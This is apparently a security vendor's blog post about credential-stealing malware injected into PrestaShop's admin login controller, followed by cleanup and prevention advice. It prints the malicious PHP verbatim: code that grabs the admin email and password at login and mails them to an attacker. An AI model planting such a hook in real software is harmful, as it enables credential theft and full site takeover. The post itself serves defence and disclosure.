As a growing e-commerce platform, Prestashop is a huge target for hackers who wish to steal information. Usually, the information that is targeted is credit card numbers, but recently, our researchers have discovered a new type of credential stealing malware that targets Prestashop sites and steals the site admin credentials. This could lead to the complete takeover of your website.
How the Prestashop Credential Stealing Malware Works
The Prestashop credential stealing malware as found injected into a file
./controllers/admin/AdminLoginController.php on Prestashop sites like this:
public function processLogin()
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
This code is used to pass server information to variables. Some of the passed variables include the usernames and passwords used to log into the Prestashop back-end. This collected information is occasionally sent to the hacker’s email address using the
PHP mail() function.
The email that is sent has everything the attacker needs to log into the hacked Prestashop site. From there, they can gain access to the site. This gives them complete access of your website’s back-end interface. This means that they can change the content, install fake/infected modules or plugins, and do a whole lot more.
In some cases, victims of this hack began to receive bounce back emails – which is likely due to Google detecting the attack and disabling/reporting the accounts involved.
The attacker/hacking group who is running this malware infection campaign is believed to be named as bajatx / B4JAT4T.
How to Fix Your Site After a Prestashop Credential Stealing Malware Infection
1. Take a backup of your site before cleaning.
It’s advisable to take the website offline so that users don’t visit the infected pages while you’re cleaning it. Make sure to take a backup of all the core files and databases. It’s a good idea to take the backup in a compressed file format, like .zip.
2. Replace the core, plugin, and theme files.
You can replace the infected core files with the original versions of the same from reputable sources. After downloading the fresh and updated versions of these files & directories, you can delete the older ones. This is especially important in cleaning up Prestashop credential stealing malware, as malicious code has been found inside the core files.
3. Clean any suspicious, recently modified files.
You might find potentially infected files by looking at the ones which were recently modified. You can restore these files from a clean backup you have or from a trusted source.
4. Run a malware scan.
Run a malware scan on your web server for malware and malicious files. You can use the ‘Virus Scanner’ tool in the cPanel provided by your web host, or get expert malware cleanup with the Astra Pro Plan, which blocks the attack and also the bots which try to download the stolen data.
In addition to these steps, you may find this article on Prestashop security helpful.
How to Prevent Further Attacks
After fixing your site, here are a few good security practices to follow which ensure that your website stays safe from Prestashop credential stealing malware:
- Make sure you’re running the latest update of your software
- Use trusted third-party payment processors
- Perform regular malware scans/security audits
- Invest in a firewall
The only sure-fire way to protect your website from hackers’ ever evolving methods is to invest in security. It is a great idea to invest in a website firewall, run frequent malware scans, and get regular security audits as that can give you a great idea of your website’s overall security.